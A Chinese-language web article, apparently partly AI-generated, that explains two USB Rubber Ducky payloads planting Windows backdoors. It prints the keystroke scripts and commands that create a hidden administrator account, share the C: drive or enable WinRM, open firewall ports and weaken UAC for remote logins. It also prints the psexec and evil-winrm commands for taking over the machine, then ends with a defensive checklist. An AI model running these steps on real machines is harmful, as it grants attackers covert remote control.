ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

win_smb-backdoor 与 win_winrm-backdoor 解析:USB Rubber Ducky 的 Windows 后门技术完整指南

win_smb-backdoor 与 win_winrm-backdoor 解析:USB Rubber Ducky 的 Windows 后门技术完整指南 win_smb-backdoor 与 win_winrm-backdoor 解析USB Rubber Ducky 的 Windows 后门技术完整指南【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloadsUSB Rubber Ducky是 Hak5 推出的经典键盘注入设备而这个仓库正是它的官方载荷库。本文聚焦其中两个 Windows 后门载荷win_smb-backdoor与win_winrm-backdoor带你完整看懂 DuckyScript 如何一步步在 Windows 上种下远程访问后门并给出防御排查思路。 什么是 USB Rubber Ducky从U 盘到键盘注入很多人第一次见到 USB Rubber Ducky 都会愣住它外形像 U 盘插上去却完全不弹盘符。秘密在于它伪装成了HID人机接口设备——也就是键盘。计算机信任人类而人类使用键盘。键盘天然被视为可信输入这正是键盘注入Keystroke Injection攻击的基石。Ducky 插入电脑后会以超人般的速度打字执行一段用DuckyScript™编写的脚本。本仓库收录了数百个社区贡献的 DuckyScript 源码payload.txt按remote_access远程访问、exfiltration数据窃取、prank恶作剧等分类你可以在 README.md 中了解整个生态键盘布局映射文件则放在 languages/us.json 等语言包中。 两款 Windows 后门载荷概览这两个载荷都位于 payloads/library/remote_access/ 目录下由作者 TW-D 编写已在 Windows 10 20H2 上实测。它们的共同点与差异一目了然对比项win_smb-backdoorwin_winrm-backdoor后门通道SMB 文件共享TCP 445WinRM 远程管理TCP 5985核心命令NET SHAREWINRM QUICKCONFIG后门效果远程访问整个 C 盘共享远程获得 PowerShell 会话连接工具psexec / SMB 客户端evil-winrm源码payload.txtpayload.txt说明README.mdREADME.md⚠️前提条件两款载荷都要求当前登录用户属于Administrators组见 payload 头部注释的 REQUIREMENTS 部分。 四阶段攻击流程逐步拆解两个 payload 的骨架几乎一致都是四步走唤起提权终端 → 建管理员账号 → 开放远程通道 → 隐身加固。下面以 win_smb-backdoor/payload.txt 为例逐段解读。阶段 1唤起看不见的管理员终端GUI r DELAY 3000 STRING cmd DELAY 1000 CTRL-SHIFT ENTERGUI r按下 Win 键打开开始菜单STRING cmd输入命令行再配合CTRL-SHIFT ENTER以管理员身份运行。随后的DELAY 5000等待 UAC 确认弹窗被点击——这一步需要人工交互或目标默认自动通过。阶段 2创建管理员账号并拉入管理组NET USER RD_User RD_PssW0rD /ADD NET LOCALGROUP Administrators RD_User /ADD两条命令先创建用户RD_User再把它加入本地Administrators组——至此这台机器上多了一个隐形超级管理员。阶段 3打开远程后门通道两者分道扬镳的地方SMB 版NET SHARE RD_SHAREC:\ /GRANT:RD_User,FULL把整个 C 盘共享出去随后用NETSH添加防火墙规则放行TCP 445入站。WinRM 版WINRM QUICKCONFIG一键启用 Windows 远程管理脚本甚至自动按y确认再放行TCP 5985。阶段 4隐身加固——两步反侦察REG ADD ...\Policies\System /f /v LocalAccountTokenFilterPolicy /d 1 REG ADD ...\SpecialAccounts\UserList /f /v RD_User /d 0这两条注册表操作是整个 payload 最精妙的部分LocalAccountTokenFilterPolicy 1解除 Windows 对本地账号远程登录的 UAC 降权限制否则 SMB/WinRM 远程登录该本地账号时权限会被打回原形SpecialAccounts\UserList\RD_User 0把新账号从登录界面、用户列表中彻底隐藏——whoami /all、控制面板里都找不到它的影子。执行完毕payload 输入EXIT悄悄关闭终端整个过程用户几乎无感。 后门长什么样远程接管目标机器后门建成后攻击者从自己的机器发起连接即可# SMB 后门psexec 直接获得 SYSTEM 级 shell psexec.py RD_User:RD_PssW0rDTARGET_IP C:\WINDOWS\system32 whoami nt authority\system # WinRM 后门evil-winrm 获得交互式 PowerShell evil-winrm --ip TARGET_IP --user RD_User --password RD_PssW0rD PS C:\Users\RD_User\Documents whoamiSMB 版威力在于能直接以SYSTEM权限操作整机文件smb://TARGET/RD_SHARE/可映射 C 盘WinRM 版则提供一条合法的远程 PowerShell 通道5985 端口还是 Windows 服务器角色自带端口更不易引起怀疑。 DuckyScript 速查读懂载荷只需几个关键字如果你也想读更多仓库里的 payload只需掌握这些高频命令详见 payloads/examples/ 下的官方示例命令作用后门中的用法DELAY 1500等待指定毫秒给每条命令留执行时间GUI r按 Win 键唤起开始菜单STRING xxx快速打字输入命令文本ENTER回车执行命令CTRL-SHIFT ENTER组合键提权运行REM注释编写文档说明️ 防御视角如何排查这类 Windows 后门理解攻击是防御的第一步。IT 管理员可以重点检查以下四处对照上方阶段 2~4 逐条反向排查异常本地账号net user查看是否有陌生管理员特别留意登录界面看不见却存在于组策略中的账号可疑共享net share检查是否存在 C 盘全盘共享如RD_SHARE防火墙规则确认 445/5985 端口入站规则是否为官方业务所需注册表痕迹检查LocalAccountTokenFilterPolicy与SpecialAccounts\UserList下是否有被篡改的隐藏账号条目。此外避免在开始菜单搜索框随意输入cmd类程序名后盲点回车是降低此类注入成功率的简单习惯。 延伸阅读仓库总览与 DuckyScript 介绍README.md社区载荷贡献规范CONTRIBUTING.md同类远程访问载荷ReverseDucky 系列、RegDoor 等payloads/library/remote_access/键盘布局语言包languages/⚖️免责声明本仓库所有载荷仅供学习与授权安全审计使用。未经授权在他人设备上部署后门属于违法行为请务必遵守当地法律法规并在自己的实验环境中练习。【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloads创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表